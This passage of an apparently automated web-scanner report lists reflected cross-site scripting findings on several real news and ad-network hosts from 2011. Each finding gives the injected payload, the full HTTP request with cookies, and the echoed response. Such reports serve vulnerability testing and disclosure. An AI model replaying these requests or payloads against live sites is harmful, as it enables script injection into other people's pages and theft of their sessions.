pf=W2lAvdO3UPK-67n93CR4V70h141EwRpVphJqTZeRapKuzdsXKOJykAJ3JxnPju9g5ehdKFP2wXAGuCUFv7XIPM0FzExGm1jv4Kvu640165OBvBXtoV0UQOpa27TXESVF-de5fP3AwoGiR_AIBPhToig1AM_gTSow1560pWbhh838I1Xi_FMkgIPwMPeBqodwgbWWL1_JBXWn8zgepH7BPbePalyqFZ93Lsfi8SgLVgTh-j-bH1npoySPlo-IWRvpNkaZBgGmnWJmvGYlVmPlSbHlSr1VTT1nlb50Fr5vj40NZDpqhun3lj0r0CvR0Vihm4m9vudXxCMFAjgeVFO5-xpIFGJioNw2vkEYe3YJ8emaUo3Hsp3jaymvGUlYuixmCOI3go4MrecUnPRzHm5YdxPKKY4kV-q2UJvSEkgnXksxeQb5A05wXSsD8Fj_F7za0NBQ4tKieMWx6gEN0MztGbK9Ye_wQX5bwuwz0ovjoTMcI4I2StnJ390lD_AvrOFoljQUjac8_W0UA2peA_VkfivKVPa-K620ApvhUtsRg48; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15018%7C15018%7C15018%7C15018%7Cundefined%7C15019%7C15018%7C15018%7C15018%7C15018%7C15019%7C15019%7C14983%7C15019%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sat, 13-Aug-2011 02:34:41 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:34:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3324908302978229243&fpid=4&nu=n&t=&sp=759fc"><script>alert(1)</script>eda4d1587f5&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.250. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.desmoinesregister.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 4bc88<script>alert(1)</script>6ade5d8e487 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb04bc88<script>alert(1)</script>6ade5d8e487 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

1.251. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.desmoinesregister.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3e0d6><img%20src%3da%20onerror%3dalert(1)>c7ec34ac8ea was submitted in the plckcommentonkey parameter. This input was echoed as 3e0d6><img src=a onerror=alert(1)>c7ec34ac8ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.1101133e0d6><img%20src%3da%20onerror%3dalert(1)>c7ec34ac8ea&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:36:59 GMT
Content-Length: 53645

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_5090\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.1101133e0d6><img src=a onerror=alert(1)>c7ec34ac8ea\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.252. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.desmoinesregister.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2c5a9><img%20src%3da%20onerror%3dalert(1)>5193ab9e1da was submitted in the plckcommentonkeytype parameter. This input was echoed as 2c5a9><img src=a onerror=alert(1)>5193ab9e1da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article2c5a9><img%20src%3da%20onerror%3dalert(1)>5193ab9e1da&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:36:22 GMT
Content-Length: 53997

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
68\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.110113\" commentOnKeyType=\"article2c5a9><img src=a onerror=alert(1)>5193ab9e1da\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.253. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sitelife.desmoinesregister.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the plckitemsperpage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d30a4><img%20src%3da%20onerror%3dalert(1)>1787fb2f0f9 was submitted in the plckitemsperpage parameter. This input was echoed as d30a4><img src=a onerror=alert(1)>1787fb2f0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10d30a4><img%20src%3da%20onerror%3dalert(1)>1787fb2f0f9&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:37:36 GMT
Content-Length: 53856

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_87422\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10d30a4><img src=a onerror=alert(1)>1787fb2f0f9\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.110113\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.254. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicated.mondominishows.com
Path:	/custom/vertical600iframe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6ca"><script>alert(1)</script>7c1462a336b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e6ca\"><script>alert(1)</script>7c1462a336b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009&pr=1/7e6ca"><script>alert(1)</script>7c1462a336b5246 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=327B72C701B040B7AA1687E0DA3C2104; path=/
Content-Length: 1223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009&pr=1/7e6ca\"><script>alert(1)</script>7c1462a336b5246">
...[SNIP]...

1.255. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicated.mondominishows.com
Path:	/custom/vertical600iframe.php

Issue detail

The value of the pr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f78d6"><script>alert(1)</script>69a7616f754 was submitted in the pr parameter. This input was echoed as f78d6\"><script>alert(1)</script>69a7616f754 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6"><script>alert(1)</script>69a7616f754 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=734E049A619C78796B6D0F1A9CD7EBD0; path=/
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009&pr=15246f78d6\"><script>alert(1)</script>69a7616f754">
...[SNIP]...

1.256. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicated.mondominishows.com
Path:	/custom/vertical600iframe.php

Issue detail

The value of the pubsite_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997b7"><script>alert(1)</script>a84b9ee361d was submitted in the pubsite_id parameter. This input was echoed as 997b7\"><script>alert(1)</script>a84b9ee361d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009997b7"><script>alert(1)</script>a84b9ee361d&pr=15246 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=4BB31D516EB9DC054E43E04B9C9C8368; path=/
Content-Length: 1221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009997b7\"><script>alert(1)</script>a84b9ee361d&pr=15246">
...[SNIP]...

1.257. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e01"%3balert(1)//418a5dd2e6f was submitted in the action parameter. This input was echoed as e7e01";alert(1)//418a5dd2e6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWADe7e01"%3balert(1)//418a5dd2e6f&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -702944365
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWADe7e01";alert(1)//418a5dd2e6f";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

1.258. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5a22"%3balert(1)//61ab18cb0e was submitted in the cwadformat parameter. This input was echoed as d5a22";alert(1)//61ab18cb0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250d5a22"%3balert(1)//61ab18cb0e&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -745973263
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5703
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250d5a22";alert(1)//61ab18cb0e";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

1.259. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b05a"%3balert(1)//b16ea565ed2 was submitted in the cwheight parameter. This input was echoed as 2b05a";alert(1)//b16ea565ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=2502b05a"%3balert(1)//b16ea565ed2&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB25
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: 425375877
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:41 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2502b05a";alert(1)//b16ea565ed2";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

1.260. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5805"%3balert(1)//d5cbc1d5373 was submitted in the cwpid parameter. This input was echoed as d5805";alert(1)//d5cbc1d5373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=526735d5805"%3balert(1)//d5cbc1d5373&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
